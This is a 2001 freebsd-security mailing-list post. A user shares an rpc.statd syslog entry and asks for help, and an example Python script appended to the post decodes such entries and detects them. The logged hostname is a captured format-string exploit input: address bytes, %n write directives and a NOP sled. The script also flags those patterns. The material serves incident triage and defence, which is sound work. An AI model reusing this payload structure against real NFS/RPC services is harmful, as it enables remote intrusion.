Date: Mon, 4 Jun 2001 01:30:42 -0500 (CDT)
From: Josh Thomas
To: freebsd-security@freebsd.org
Subject: rpc.statd attack before ipfw activated

I didn't set up ipfw for a couple of days in between setting up a small nfs
server for an in-home lan, and I got this in my system log. I realize that I
should have set up ipfw before doing this now, but any ideas what just
happened?
Here is the log:

Jun 2 19:36:41 thatguys rpc.statd: invalid hostname to sm_stat: ^X\xf7\xff\xbf^
X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7\xff\
xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P
Jun 2 19:36:41 thatguys /kernel: PM-^PM-^PM-^P

And it cut off there. This is a home machine, and yes, I realize that a
firewall should have been running first; however, I didn't have time. I'm a
relative novice to rpc and nfs in general, so any clues would be appreciated.

Thanks,
Josh Thomas
Student Systems Analyst
Engineering Computing Center
Kansas State University
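
Added example, not part of the original post: one way to triage entries like the one above, by undoing the log's escaping and counting `%n` directives and runs of 0x90 bytes (the x86 NOP opcode) in the hostname field that rpc.statd rejected. Reading the escapes as `\xNN` hex, `^C` caret and `M-` meta notation is an assumption about how this log was rendered; the function names, the run threshold of 8 and the sample lines are constructed for illustration.

```python
import re

# Escape notations seen in the logged hostname: \xNN, M-^C, M-c and ^C.
TOKEN = re.compile(r"\\x([0-9a-fA-F]{2})|M-\^(.)|M-(.)|\^(.)")
MARKER = "invalid hostname to sm_stat: "

def unescape(text):
    """Rebuild the raw bytes behind the escaped hostname text."""
    out, pos = bytearray(), 0
    for m in TOKEN.finditer(text):
        out += text[pos:m.start()].encode("latin-1", "replace")
        hexval, meta_ctrl, meta, ctrl = m.groups()
        if hexval:
            out.append(int(hexval, 16))
        elif meta_ctrl:   # M-^P -> 0x80 | 0x10 = 0x90
            out.append(0x80 | ((ord(meta_ctrl) ^ 0x40) & 0x7F))
        elif meta:        # M-c -> c with the high bit set
            out.append(0x80 | (ord(meta) & 0x7F))
        else:             # ^X -> 0x18
            out.append((ord(ctrl) ^ 0x40) & 0x7F)
        pos = m.end()
    out += text[pos:].encode("latin-1", "replace")
    return bytes(out)

def analyze(line):
    """Findings for one syslog line, or None if it is not an sm_stat rejection."""
    if "rpc.statd" not in line or MARKER not in line:
        return None
    raw = unescape(line.split(MARKER, 1)[1])
    directives = re.findall(rb"%\d*[a-zA-Z]", raw)
    return {
        "length": len(raw),
        "format_directives": len(directives),
        "write_directives": sum(d.endswith(b"n") for d in directives),
        "longest_0x90_run": max(map(len, re.findall(rb"\x90{8,}", raw)), default=0),
        "non_printable": sum(b < 0x20 or b > 0x7E for b in raw),
    }

def suspicious(findings):
    """Assumed rule: any %n, any 0x90 run of 8 or more, or any non-printable byte."""
    return bool(findings) and (findings["write_directives"] > 0
        or findings["longest_0x90_run"] > 0 or findings["non_printable"] > 0)

# Constructed sample lines, shortened but shaped like the entry in the post.
ATTACK = ("Jun  2 19:36:41 host rpc.statd: " + MARKER
          + r"^X\xf7\xff\xbf^Y\xf7\xff\xbf%8x%8x%236x%n%137x%n" + "M-^P" * 16)
BENIGN = "Jun  2 19:40:02 host rpc.statd: " + MARKER + "bad_host!name"

if __name__ == "__main__":
    print([(suspicious(analyze(s)), analyze(s)) for s in (ATTACK, BENIGN)])
```

A hostname is never expected to carry `%n` or long 0x90 runs, so a hit on either is worth correlating with the source address in firewall or packet logs.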